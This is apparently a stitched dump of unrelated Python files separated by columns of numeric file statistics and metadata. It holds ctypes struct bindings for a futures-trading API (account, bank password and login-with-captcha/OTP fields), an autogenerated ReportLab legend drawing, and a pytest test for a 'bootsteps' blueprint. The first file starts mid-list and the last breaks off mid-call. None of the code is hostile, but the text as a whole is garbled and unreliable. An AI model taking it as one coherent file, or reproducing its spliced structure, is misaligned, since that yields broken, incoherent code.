("Fax", c_char_Array_41),
("EMail", c_char_Array_41),
("MoneyAccountStatus", c_char),
("BankAccount", c_char_Array_41),
("BankPassWord", c_char_Array_41),
("InstallID", c_int),
("VerifyCertNoFlag", c_char),
("CurrencyID", c_char_Array_4),
("Digest", c_char_Array_36),
("BankAccType", c_char),
("BrokerIDByBank", c_char_Array_33),
("TID", c_int),
("AccountID", c_char_Array_13),
("Password", c_char_Array_41),
("BankReserveOpenSeq", c_char_Array_13),
("BookDate", c_char_Array_9),
("BookPsw", c_char_Array_41),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, Gender=None, CountryCode=None, CustType=None, Address=None, ZipCode=None, Telephone=None, MobilePhone=None, Fax=None, EMail=None, MoneyAccountStatus=None, BankAccount=None, BankPassWord=None, InstallID=None, VerifyCertNoFlag=None, CurrencyID=None, Digest=None, BankAccType=None, BrokerIDByBank=None, TID=None, AccountID=None, Password=None, BankReserveOpenSeq=None, BookDate=None, BookPsw=None, ErrorID=None, ErrorMsg=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if CustomerName:
self.CustomerName = CustomerName.encode("GBK")
if IdCardType:
self.IdCardType = IdCardType.encode("GBK")
if IdentifiedCardNo:
self.IdentifiedCardNo = IdentifiedCardNo.encode("GBK")
if Gender:
self.Gender = Gender.encode("GBK")
if CountryCode:
self.CountryCode = CountryCode.encode("GBK")
if CustType:
self.CustType = CustType.encode("GBK")
if Address:
self.Address = Address.encode("GBK")
if ZipCode:
self.ZipCode = ZipCode.encode("GBK")
if Telephone:
self.Telephone = Telephone.encode("GBK")
if MobilePhone:
self.MobilePhone = MobilePhone.encode("GBK")
if Fax:
self.Fax = Fax.encode("GBK")
if EMail:
self.EMail = EMail.encode("GBK")
if MoneyAccountStatus:
self.MoneyAccountStatus = MoneyAccountStatus.encode("GBK")
if BankAccount:
self.BankAccount = BankAccount.encode("GBK")
if BankPassWord:
self.BankPassWord = BankPassWord.encode("GBK")
if InstallID:
self.InstallID = InstallID
if VerifyCertNoFlag:
self.VerifyCertNoFlag = VerifyCertNoFlag.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if Digest:
self.Digest = Digest.encode("GBK")
if BankAccType:
self.BankAccType = BankAccType.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if TID:
self.TID = TID
if AccountID:
self.AccountID = AccountID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if BankReserveOpenSeq:
self.BankReserveOpenSeq = BankReserveOpenSeq.encode("GBK")
if BookDate:
self.BookDate = BookDate.encode("GBK")
if BookPsw:
self.BookPsw = BookPsw.encode("GBK")
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
class ReserveOpenAccount(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("CustomerName", c_char_Array_161),
("IdCardType", c_char),
("IdentifiedCardNo", c_char_Array_51),
("Gender", c_char),
("CountryCode", c_char_Array_21),
("CustType", c_char),
("Address", c_char_Array_101),
("ZipCode", c_char_Array_7),
("Telephone", c_char_Array_41),
("MobilePhone", c_char_Array_21),
("Fax", c_char_Array_41),
("EMail", c_char_Array_41),
("MoneyAccountStatus", c_char),
("BankAccount", c_char_Array_41),
("BankPassWord", c_char_Array_41),
("InstallID", c_int),
("VerifyCertNoFlag", c_char),
("CurrencyID", c_char_Array_4),
("Digest", c_char_Array_36),
("BankAccType", c_char),
("BrokerIDByBank", c_char_Array_33),
("TID", c_int),
("ReserveOpenAccStas", c_char),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, Gender=None, CountryCode=None, CustType=None, Address=None, ZipCode=None, Telephone=None, MobilePhone=None, Fax=None, EMail=None, MoneyAccountStatus=None, BankAccount=None, BankPassWord=None, InstallID=None, VerifyCertNoFlag=None, CurrencyID=None, Digest=None, BankAccType=None, BrokerIDByBank=None, TID=None, ReserveOpenAccStas=None, ErrorID=None, ErrorMsg=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if CustomerName:
self.CustomerName = CustomerName.encode("GBK")
if IdCardType:
self.IdCardType = IdCardType.encode("GBK")
if IdentifiedCardNo:
self.IdentifiedCardNo = IdentifiedCardNo.encode("GBK")
if Gender:
self.Gender = Gender.encode("GBK")
if CountryCode:
self.CountryCode = CountryCode.encode("GBK")
if CustType:
self.CustType = CustType.encode("GBK")
if Address:
self.Address = Address.encode("GBK")
if ZipCode:
self.ZipCode = ZipCode.encode("GBK")
if Telephone:
self.Telephone = Telephone.encode("GBK")
if MobilePhone:
self.MobilePhone = MobilePhone.encode("GBK")
if Fax:
self.Fax = Fax.encode("GBK")
if EMail:
self.EMail = EMail.encode("GBK")
if MoneyAccountStatus:
self.MoneyAccountStatus = MoneyAccountStatus.encode("GBK")
if BankAccount:
self.BankAccount = BankAccount.encode("GBK")
if BankPassWord:
self.BankPassWord = BankPassWord.encode("GBK")
if InstallID:
self.InstallID = InstallID
if VerifyCertNoFlag:
self.VerifyCertNoFlag = VerifyCertNoFlag.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if Digest:
self.Digest = Digest.encode("GBK")
if BankAccType:
self.BankAccType = BankAccType.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if TID:
self.TID = TID
if ReserveOpenAccStas:
self.ReserveOpenAccStas = ReserveOpenAccStas.encode("GBK")
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
class AccountProperty(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("AccountID", c_char_Array_13),
("BankID", c_char_Array_4),
("BankAccount", c_char_Array_41),
("OpenName", c_char_Array_101),
("OpenBank", c_char_Array_101),
("IsActive", c_int),
("AccountSourceType", c_char),
("OpenDate", c_char_Array_9),
("CancelDate", c_char_Array_9),
("OperatorID", c_char_Array_65),
("OperateDate", c_char_Array_9),
("OperateTime", c_char_Array_9),
("CurrencyID", c_char_Array_4),
]
def __init__(self, BrokerID=None, AccountID=None, BankID=None, BankAccount=None, OpenName=None, OpenBank=None, IsActive=None, AccountSourceType=None, OpenDate=None, CancelDate=None, OperatorID=None, OperateDate=None, OperateTime=None, CurrencyID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankAccount:
self.BankAccount = BankAccount.encode("GBK")
if OpenName:
self.OpenName = OpenName.encode("GBK")
if OpenBank:
self.OpenBank = OpenBank.encode("GBK")
if IsActive:
self.IsActive = IsActive
if AccountSourceType:
self.AccountSourceType = AccountSourceType.encode("GBK")
if OpenDate:
self.OpenDate = OpenDate.encode("GBK")
if CancelDate:
self.CancelDate = CancelDate.encode("GBK")
if OperatorID:
self.OperatorID = OperatorID.encode("GBK")
if OperateDate:
self.OperateDate = OperateDate.encode("GBK")
if OperateTime:
self.OperateTime = OperateTime.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
class QryCurrDRIdentity(Struct):
_fields_ = [
("DRIdentityID", c_int),
]
def __init__(self, DRIdentityID=None):
super().__init__()
if DRIdentityID:
self.DRIdentityID = DRIdentityID
class CurrDRIdentity(Struct):
_fields_ = [
("DRIdentityID", c_int),
]
def __init__(self, DRIdentityID=None):
super().__init__()
if DRIdentityID:
self.DRIdentityID = DRIdentityID
class QrySecAgentCheckMode(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
]
def __init__(self, BrokerID=None, InvestorID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
class QrySecAgentTradeInfo(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("BrokerSecAgentID", c_char_Array_13),
]
def __init__(self, BrokerID=None, BrokerSecAgentID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerSecAgentID:
self.BrokerSecAgentID = BrokerSecAgentID.encode("GBK")
class UserSystemInfo(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("ClientSystemInfoLen", c_int),
("ClientSystemInfo", c_char_Array_273),
("ClientPublicIP", c_char_Array_16),
("ClientIPPort", c_int),
("ClientLoginTime", c_char_Array_9),
("ClientAppID", c_char_Array_33),
]
def __init__(self, BrokerID=None, UserID=None, ClientSystemInfoLen=None, ClientSystemInfo=None, ClientPublicIP=None, ClientIPPort=None, ClientLoginTime=None, ClientAppID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if ClientSystemInfoLen:
self.ClientSystemInfoLen = ClientSystemInfoLen
if ClientSystemInfo:
self.ClientSystemInfo = ClientSystemInfo.encode("GBK")
if ClientPublicIP:
self.ClientPublicIP = ClientPublicIP.encode("GBK")
if ClientIPPort:
self.ClientIPPort = ClientIPPort
if ClientLoginTime:
self.ClientLoginTime = ClientLoginTime.encode("GBK")
if ClientAppID:
self.ClientAppID = ClientAppID.encode("GBK")
class ReqUserAuthMethod(Struct):
_fields_ = [
("TradingDay", c_char_Array_9),
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
]
def __init__(self, TradingDay=None, BrokerID=None, UserID=None):
super().__init__()
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
class RspUserAuthMethod(Struct):
_fields_ = [
("UsableAuthMethod", c_int),
]
def __init__(self, UsableAuthMethod=None):
super().__init__()
if UsableAuthMethod:
self.UsableAuthMethod = UsableAuthMethod
class ReqGenUserCaptcha(Struct):
_fields_ = [
("TradingDay", c_char_Array_9),
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
]
def __init__(self, TradingDay=None, BrokerID=None, UserID=None):
super().__init__()
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
class RspGenUserCaptcha(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("CaptchaInfoLen", c_int),
("CaptchaInfo", c_char_Array_2561),
]
def __init__(self, BrokerID=None, UserID=None, CaptchaInfoLen=None, CaptchaInfo=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if CaptchaInfoLen:
self.CaptchaInfoLen = CaptchaInfoLen
if CaptchaInfo:
self.CaptchaInfo = CaptchaInfo.encode("GBK")
class ReqGenUserText(Struct):
_fields_ = [
("TradingDay", c_char_Array_9),
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
]
def __init__(self, TradingDay=None, BrokerID=None, UserID=None):
super().__init__()
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
class RspGenUserText(Struct):
_fields_ = [
("UserTextSeq", c_int),
]
def __init__(self, UserTextSeq=None):
super().__init__()
if UserTextSeq:
self.UserTextSeq = UserTextSeq
class ReqUserLoginWithCaptcha(Struct):
_fields_ = [
("TradingDay", c_char_Array_9),
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("Password", c_char_Array_41),
("UserProductInfo", c_char_Array_11),
("InterfaceProductInfo", c_char_Array_11),
("ProtocolInfo", c_char_Array_11),
("MacAddress", c_char_Array_21),
("ClientIPAddress", c_char_Array_16),
("LoginRemark", c_char_Array_36),
("Captcha", c_char_Array_41),
("ClientIPPort", c_int),
]
def __init__(self, TradingDay=None, BrokerID=None, UserID=None, Password=None, UserProductInfo=None, InterfaceProductInfo=None, ProtocolInfo=None, MacAddress=None, ClientIPAddress=None, LoginRemark=None, Captcha=None, ClientIPPort=None):
super().__init__()
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if UserProductInfo:
self.UserProductInfo = UserProductInfo.encode("GBK")
if InterfaceProductInfo:
self.InterfaceProductInfo = InterfaceProductInfo.encode("GBK")
if ProtocolInfo:
self.ProtocolInfo = ProtocolInfo.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
if ClientIPAddress:
self.ClientIPAddress = ClientIPAddress.encode("GBK")
if LoginRemark:
self.LoginRemark = LoginRemark.encode("GBK")
if Captcha:
self.Captcha = Captcha.encode("GBK")
if ClientIPPort:
self.ClientIPPort = ClientIPPort
class ReqUserLoginWithText(Struct):
_fields_ = [
("TradingDay", c_char_Array_9),
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("Password", c_char_Array_41),
("UserProductInfo", c_char_Array_11),
("InterfaceProductInfo", c_char_Array_11),
("ProtocolInfo", c_char_Array_11),
("MacAddress", c_char_Array_21),
("ClientIPAddress", c_char_Array_16),
("LoginRemark", c_char_Array_36),
("Text", c_char_Array_41),
("ClientIPPort", c_int),
]
def __init__(self, TradingDay=None, BrokerID=None, UserID=None, Password=None, UserProductInfo=None, InterfaceProductInfo=None, ProtocolInfo=None, MacAddress=None, ClientIPAddress=None, LoginRemark=None, Text=None, ClientIPPort=None):
super().__init__()
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if UserProductInfo:
self.UserProductInfo = UserProductInfo.encode("GBK")
if InterfaceProductInfo:
self.InterfaceProductInfo = InterfaceProductInfo.encode("GBK")
if ProtocolInfo:
self.ProtocolInfo = ProtocolInfo.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
if ClientIPAddress:
self.ClientIPAddress = ClientIPAddress.encode("GBK")
if LoginRemark:
self.LoginRemark = LoginRemark.encode("GBK")
if Text:
self.Text = Text.encode("GBK")
if ClientIPPort:
self.ClientIPPort = ClientIPPort
class ReqUserLoginWithOTP(Struct):
_fields_ = [
("TradingDay", c_char_Array_9),
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("Password", c_char_Array_41),
("UserProductInfo", c_char_Array_11),
("InterfaceProductInfo", c_char_Array_11),
("ProtocolInfo", c_char_Array_11),
("MacAddress", c_char_Array_21),
("ClientIPAddress", c_char_Array_16),
("LoginRemark", c_char_Array_36),
("OTPPassword", c_char_Array_41),
("ClientIPPort", c_int),
]
def __init__(self, TradingDay=None, BrokerID=None, UserID=None, Password=None, UserProductInfo=None, InterfaceProductInfo=None, ProtocolInfo=None, MacAddress=None, ClientIPAddress=None, LoginRemark=None, OTPPassword=None, ClientIPPort=None):
super().__init__()
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if UserProductInfo:
self.UserProductInfo = UserProductInfo.encode("GBK")
if InterfaceProductInfo:
self.InterfaceProductInfo = InterfaceProductInfo.encode("GBK")
if ProtocolInfo:
self.ProtocolInfo = ProtocolInfo.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
if ClientIPAddress:
self.ClientIPAddress = ClientIPAddress.encode("GBK")
if LoginRemark:
self.LoginRemark = LoginRemark.encode("GBK")
if OTPPassword:
self.OTPPassword = OTPPassword.encode("GBK")
if ClientIPPort:
self.ClientIPPort = ClientIPPort
class ReqApiHandshake(Struct):
_fields_ = [
("CryptoKeyVersion", c_char_Array_31),
]
def __init__(self, CryptoKeyVersion=None):
super().__init__()
if CryptoKeyVersion:
self.CryptoKeyVersion = CryptoKeyVersion.encode("GBK")
class RspApiHandshake(Struct):
_fields_ = [
("FrontHandshakeDataLen", c_int),
("FrontHandshakeData", c_char_Array_301),
("IsApiAuthEnabled", c_int),
]
def __init__(self, FrontHandshakeDataLen=None, FrontHandshakeData=None, IsApiAuthEnabled=None):
super().__init__()
if FrontHandshakeDataLen:
self.FrontHandshakeDataLen = FrontHandshakeDataLen
if FrontHandshakeData:
self.FrontHandshakeData = FrontHandshakeData.encode("GBK")
if IsApiAuthEnabled:
self.IsApiAuthEnabled = IsApiAuthEnabled
class ReqVerifyApiKey(Struct):
_fields_ = [
("ApiHandshakeDataLen", c_int),
("ApiHandshakeData", c_char_Array_301),
]
def __init__(self, ApiHandshakeDataLen=None, ApiHandshakeData=None):
super().__init__()
if ApiHandshakeDataLen:
self.ApiHandshakeDataLen = ApiHandshakeDataLen
if ApiHandshakeData:
self.ApiHandshakeData = ApiHandshakeData.encode("GBK")
class DepartmentUser(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("InvestorRange", c_char),
("InvestorID", c_char_Array_13),
]
def __init__(self, BrokerID=None, UserID=None, InvestorRange=None, InvestorID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if InvestorRange:
self.InvestorRange = InvestorRange.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
class QueryFreq(Struct):
_fields_ = [
("QueryFreq", c_int),
]
def __init__(self, QueryFreq=None):
super().__init__()
if QueryFreq:
self.QueryFreq = QueryFreq
| 38.236336
| 1,215
| 0.616005
| 52,697
| 552,668
| 6.225459
| 0.021292
| 0.045159
| 0.086407
| 0.01529
| 0.907862
| 0.895535
| 0.889122
| 0.876874
| 0.864209
| 0.853909
| 0
| 0.01149
| 0.272153
| 552,668
| 14,453
| 1,216
| 38.238982
| 0.804064
| 0.001247
| 0
| 0.874308
| 0
| 0
| 0.090793
| 0.003796
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026395
| false
| 0.016599
| 0.00015
| 0
| 0.079333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
51acef59bd8970f0eff0cb4af97ae09cdca66646
| 2,847
|
py
|
Python
|
tests/charts-out/test_graphics_charts_legends_sample2c.py
|
debragail/reportlab-mirror
|
1e5814e1313ed50d5abb65487b207711cb4f7595
|
[
"BSD-3-Clause"
] | 1
|
2020-05-21T23:34:55.000Z
|
2020-05-21T23:34:55.000Z
|
tests/charts-out/test_graphics_charts_legends_sample2c.py
|
debragail/reportlab-mirror
|
1e5814e1313ed50d5abb65487b207711cb4f7595
|
[
"BSD-3-Clause"
] | null | null | null |
tests/charts-out/test_graphics_charts_legends_sample2c.py
|
debragail/reportlab-mirror
|
1e5814e1313ed50d5abb65487b207711cb4f7595
|
[
"BSD-3-Clause"
] | null | null | null |
#Autogenerated by ReportLab guiedit do not edit
from reportlab.graphics.shapes import _DrawingEditorMixin, Drawing, Group, Rect, String
from reportlab.lib.colors import Color, CMYKColor, PCMYKColor
class ExplodedDrawing_Drawing(_DrawingEditorMixin,Drawing):
def __init__(self,width=200,height=100,*args,**kw):
Drawing.__init__(self,width,height,*args,**kw)
self.transform = (1,0,0,1,0,0)
self.add(Rect(20,80,10,10,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(String(40,81.585,'red',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
self.add(Rect(20,60,10,10,rx=0,ry=0,fillColor=Color(0,.501961,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(String(40,61.585,'green',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
self.add(Rect(20,40,10,10,rx=0,ry=0,fillColor=Color(0,0,1,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(String(40,41.585,'blue',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
self.add(Rect(20,20,10,10,rx=0,ry=0,fillColor=Color(1,1,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(String(40,21.585,'yellow',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
self.add(Rect(80,80,10,10,rx=0,ry=0,fillColor=Color(1,.752941,.796078,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(String(100,81.585,'pink',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
self.add(Rect(80,60,10,10,rx=0,ry=0,fillColor=Color(0,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(String(100,61.585,'black',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
self.add(Rect(80,40,10,10,rx=0,ry=0,fillColor=Color(1,1,1,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(String(100,41.585,'white',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
if __name__=="__main__": #NORUNTESTS
ExplodedDrawing_Drawing().save(formats=['pdf'],outDir='.',fnRoot=None)
| 105.444444
| 226
| 0.778012
| 465
| 2,847
| 4.72043
| 0.178495
| 0.03098
| 0.024601
| 0.05467
| 0.784055
| 0.784055
| 0.784055
| 0.784055
| 0.784055
| 0.782232
| 0
| 0.09953
| 0.029505
| 2,847
| 26
| 227
| 109.5
| 0.694897
| 0.01967
| 0
| 0
| 1
| 0
| 0.055934
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.090909
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cfc30ca6802807cfa04dde39d0026d4ddcc6ff78
| 19,052
|
py
|
Python
|
tests/test_blueprint.py
|
celery/bootsteps
|
f2e788edb182d54037c5f2b9fad28dc81f701f8e
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_blueprint.py
|
celery/bootsteps
|
f2e788edb182d54037c5f2b9fad28dc81f701f8e
|
[
"BSD-3-Clause"
] | 1
|
2019-10-24T16:46:50.000Z
|
2019-10-24T16:46:50.000Z
|
tests/test_blueprint.py
|
celery/bootsteps
|
f2e788edb182d54037c5f2b9fad28dc81f701f8e
|
[
"BSD-3-Clause"
] | 1
|
2019-09-29T03:36:17.000Z
|
2019-09-29T03:36:17.000Z
|
from unittest.mock import call
import pytest
import trio
from asynctest import MagicMock, Mock
from eliot.testing import LoggedAction, LoggedMessage
from bootsteps import AsyncStep, Blueprint
from bootsteps.blueprint import BlueprintState, ExecutionOrder
from tests.assertions import (
assert_log_message_field_equals,
assert_logged_action_failed,
assert_logged_action_succeeded,
assert_field_equals_in_any_message
)
from tests.mocks import TrioCoroutineMock, create_mock_step, create_start_stop_mock_step
@pytest.fixture
def mock_execution_order_strategy_class():
return MagicMock(name="ExecutionOrder", spec_set=ExecutionOrder)
@pytest.fixture(autouse=True)
def mock_inspect_isawaitable(mocker):
return mocker.patch(
"bootsteps.blueprint.inspect.isawaitable",
side_effect=lambda o: isinstance(o, TrioCoroutineMock),
)
def assert_parallelized_steps_are_in_order(
actual_execution_order, expected_execution_order
):
__tracebackhide__ = True
begin = 0
# Test that all the steps were parallelized in the same order
for steps in expected_execution_order:
end = begin + len(steps)
assert sorted(steps) == sorted(actual_execution_order[begin:end])
begin = end
# Ensure no further calls were made
assert not actual_execution_order[begin:]
def test_init(bootsteps_graph, mock_execution_order_strategy_class):
b = Blueprint(
bootsteps_graph,
name="Test",
execution_order_strategy_class=mock_execution_order_strategy_class,
)
assert b.name == "Test"
assert b._steps == bootsteps_graph
assert b.state == BlueprintState.INITIALIZED
assert b.execution_order_strategy_class == mock_execution_order_strategy_class
async def test_blueprint_start(
bootsteps_graph, mock_execution_order_strategy_class, logger
):
mock_step1 = create_mock_step("step1")
mock_step2 = create_start_stop_mock_step("step2")
mock_step3 = create_mock_step("step3")
mock_step4 = create_start_stop_mock_step("step4", mock_class=TrioCoroutineMock)
mock_step5 = create_mock_step("step5")
mock_step6 = create_mock_step("step6", spec=AsyncStep, mock_class=TrioCoroutineMock)
# We're using a parent mock simply to record the order of calls to different
# steps
m = Mock()
m.attach_mock(mock_step1, "mock_step1")
m.attach_mock(mock_step2, "mock_step2")
m.attach_mock(mock_step3, "mock_step3")
m.attach_mock(mock_step4, "mock_step4")
m.attach_mock(mock_step5, "mock_step5")
m.attach_mock(mock_step6, "mock_step6")
expected_execution_order = [
[m.mock_step1, m.mock_step2],
[m.mock_step3, m.mock_step4, m.mock_step5],
[m.mock_step6],
]
mock_iterator = MagicMock()
mock_iterator.__iter__.return_value = expected_execution_order
mock_execution_order_strategy_class.return_value = mock_iterator
blueprint = Blueprint(
bootsteps_graph,
name="Test",
execution_order_strategy_class=mock_execution_order_strategy_class,
)
async with trio.open_nursery() as nursery:
nursery.start_soon(blueprint.start)
with trio.fail_after(1):
assert (
await blueprint.state_changes_receive_channel.receive()
== BlueprintState.RUNNING
)
with trio.fail_after(1):
assert (
await blueprint.state_changes_receive_channel.receive()
== BlueprintState.COMPLETED
)
mock_execution_order_strategy_class.assert_called_once_with(blueprint._steps)
assert_parallelized_steps_are_in_order(
m.method_calls,
[
[call.mock_step1(), call.mock_step2.start()],
[call.mock_step3(), call.mock_step4.start(), call.mock_step5()],
[call.mock_step6()],
],
)
mock_step6.assert_awaited_once_with()
mock_step4.start.assert_awaited_once_with()
logged_actions = LoggedAction.of_type(logger.messages, "bootsteps:blueprint:start")
assert len(logged_actions) == 1
logged_action = logged_actions[0]
assert_log_message_field_equals(logged_action.start_message, "name", blueprint.name)
assert_logged_action_succeeded(logged_action)
messages = LoggedMessage.of_type(
logger.messages, "bootsteps:blueprint:next_bootsteps"
)
assert len(messages) == 3
assert_log_message_field_equals(messages[0].message, "name", blueprint.name)
assert_log_message_field_equals(
messages[0].message, "next_bootsteps", [m.mock_step1, m.mock_step2]
)
assert_log_message_field_equals(messages[1].message, "name", blueprint.name)
assert_log_message_field_equals(
messages[1].message,
"next_bootsteps",
